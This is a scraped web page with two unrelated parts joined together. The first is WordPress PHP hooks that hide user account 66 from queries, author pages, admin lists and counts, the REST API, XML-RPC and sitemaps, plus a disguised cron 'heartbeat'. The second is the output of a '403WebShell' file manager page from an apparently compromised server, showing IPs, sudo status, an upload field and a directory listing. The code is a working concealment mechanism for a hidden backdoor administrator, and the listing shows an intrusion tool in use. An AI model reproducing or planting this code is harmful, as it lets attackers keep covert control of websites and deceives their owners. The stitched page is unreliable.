add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 66;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 66 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 66;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 66;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
403WebShell 403Webshell
Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000 ) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : / lib /aarch64-linux-gnu /perl /5.38.2 /CORE / Upload File :
[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
June 25 2026 04:55:24
root / root
0755
EXTERN.h
1.548 KB
June 12 2026 13:42:23
root / root
0644
INTERN.h
1.258 KB
June 12 2026 13:42:23
root / root
0644
XSUB.h
23.744 KB
June 12 2026 13:42:23
root / root
0644
av.h
6.822 KB
June 12 2026 13:42:23
root / root
0644
bitcount.h
1.014 KB
June 12 2026 13:42:23
root / root
0644
charclass_invlists.h
4.32 MB
June 12 2026 13:42:23
root / root
0644
config.h
164.686 KB
June 12 2026 13:42:23
root / root
0644
cop.h
57.214 KB
June 12 2026 13:42:23
root / root
0644
cv.h
14.284 KB
June 12 2026 13:42:23
root / root
0644
dosish.h
3.604 KB
June 12 2026 13:42:23
root / root
0644
ebcdic_tables.h
48.751 KB
June 12 2026 13:42:23
root / root
0644
embed.h
143.464 KB
June 12 2026 13:42:23
root / root
0644
embedvar.h
23.858 KB
June 12 2026 13:42:23
root / root
0644
fakesdio.h
3.135 KB
June 12 2026 13:42:23
root / root
0644
feature.h
14.976 KB
June 12 2026 13:42:23
root / root
0644
form.h
1.429 KB
June 12 2026 13:42:23
root / root
0644
git_version.h
0.349 KB
June 12 2026 13:42:23
root / root
0644
gv.h
11.671 KB
June 12 2026 13:42:23
root / root
0644
handy.h
141.931 KB
June 12 2026 13:42:23
root / root
0644
hv.h
27.616 KB
June 12 2026 13:42:23
root / root
0644
hv_func.h
7.718 KB
June 12 2026 13:42:23
root / root
0644
hv_macro.h
3.101 KB
June 12 2026 13:42:23
root / root
0644
inline.h
111.894 KB
June 12 2026 13:42:23
root / root
0644
intrpvar.h
37.873 KB
June 12 2026 13:42:23
root / root
0644
invlist_inline.h
11.216 KB
June 12 2026 13:42:23
root / root
0644
iperlsys.h
62.496 KB
June 12 2026 13:42:23
root / root
0644
keywords.h
6.637 KB
June 12 2026 13:42:23
root / root
0644
l1_char_class_tab.h
118.131 KB
June 12 2026 13:42:23
root / root
0644
malloc_ctl.h
1.488 KB
June 12 2026 13:42:23
root / root
0644
metaconfig.h
0.688 KB
June 12 2026 13:42:23
root / root
0644
mg.h
3.562 KB
June 12 2026 13:42:23
root / root
0644
mg_data.h
5.54 KB
June 12 2026 13:42:23
root / root
0644
mg_raw.h
4.713 KB
June 12 2026 13:42:23
root / root
0644
mg_vtable.h
10.288 KB
June 12 2026 13:42:23
root / root
0644
mydtrace.h
1.653 KB
June 12 2026 13:42:23
root / root
0644
nostdio.h
3.317 KB
June 12 2026 13:42:23
root / root
0644
op.h
40.876 KB
June 12 2026 13:42:23
root / root
0644
op_reg_common.h
5.897 KB
June 12 2026 13:42:23
root / root
0644
opcode.h
95.825 KB
June 12 2026 13:42:23
root / root
0644
opnames.h
9.186 KB
June 12 2026 13:42:23
root / root
0644
overload.h
3.213 KB
June 12 2026 13:42:23
root / root
0644
pad.h
19.638 KB
June 12 2026 13:42:23
root / root
0644
parser.h
6.946 KB
June 12 2026 13:42:23
root / root
0644
patchlevel-debian.h
6.188 KB
June 12 2026 13:42:23
root / root
0644
patchlevel.h
6.457 KB
June 12 2026 13:42:23
root / root
0644
perl.h
320.375 KB
June 12 2026 13:42:23
root / root
0644
perl_inc_macro.h
5.878 KB
June 12 2026 13:42:23
root / root
0644
perl_langinfo.h
2.846 KB
June 12 2026 13:42:23
root / root
0644
perl_siphash.h
5.057 KB
June 12 2026 13:42:23
root / root
0644
perlapi.h
0.62 KB
June 12 2026 13:42:23
root / root
0644
perlio.h
9.483 KB
June 12 2026 13:42:23
root / root
0644
perliol.h
13.271 KB
June 12 2026 13:42:23
root / root
0644
perlsdio.h
0.515 KB
June 12 2026 13:42:23
root / root
0644
perlstatic.h
0.873 KB
June 12 2026 13:42:23
root / root
0644
perlvars.h
16.75 KB
June 12 2026 13:42:23
root / root
0644
perly.h
5.727 KB
June 12 2026 13:42:23
root / root
0644
pp.h
29.952 KB
June 12 2026 13:42:23
root / root
0644
pp_proto.h
20.389 KB
June 12 2026 13:42:23
root / root
0644
proto.h
327.866 KB
June 12 2026 13:42:23
root / root
0644
reentr.h
85.19 KB
June 12 2026 13:42:23
root / root
0644
regcharclass.h
270.271 KB
June 12 2026 13:42:23
root / root
0644
regcomp.h
68.012 KB
June 12 2026 13:42:23
root / root
0644
regcomp_internal.h
60.732 KB
June 12 2026 13:42:23
root / root
0644
regexp.h
43.737 KB
June 12 2026 13:42:23
root / root
0644
reginline.h
1.537 KB
June 12 2026 13:42:23
root / root
0644
regnodes.h
126.979 KB
June 12 2026 13:42:23
root / root
0644
sbox32_hash.h
54.427 KB
June 12 2026 13:42:23
root / root
0644
scope.h
12.19 KB
June 12 2026 13:42:23
root / root
0644
scope_types.h
5.097 KB
June 12 2026 13:42:23
root / root
0644
sv.h
105.626 KB
June 12 2026 13:42:23
root / root
0644
sv_inline.h
27.738 KB
June 12 2026 13:42:23
root / root
0644
thread.h
19.528 KB
June 12 2026 13:42:23
root / root
0644
time64.h
0.879 KB
June 12 2026 13:42:23
root / root
0644
time64_config.h
2.021 KB
June 12 2026 13:42:23
root / root
0644
uconfig.h
164.396 KB
June 12 2026 13:42:23
root / root
0644
uni_keywords.h
557.443 KB
June 12 2026 13:42:23
root / root
0644
unicode_constants.h
56.433 KB
June 12 2026 13:42:23
root / root
0644
unixish.h
5.484 KB
June 12 2026 13:42:23
root / root
0644
utf8.h
59.917 KB
June 12 2026 13:42:23
root / root
0644
utfebcdic.h
11.483 KB
June 12 2026 13:42:23
root / root
0644
util.h
10.469 KB
June 12 2026 13:42:23
root / root
0644
uudmap.h
1.033 KB
June 12 2026 13:42:23
root / root
0644
vutil.h
3.955 KB
June 12 2026 13:42:23
root / root
0644
warnings.h
11.706 KB
June 12 2026 13:42:23
root / root
0644
zaphod32_hash.h
9.471 KB
June 12 2026 13:42:23
root / root
0644
Youez - 2016 - github.com/yon3zuLinuXploit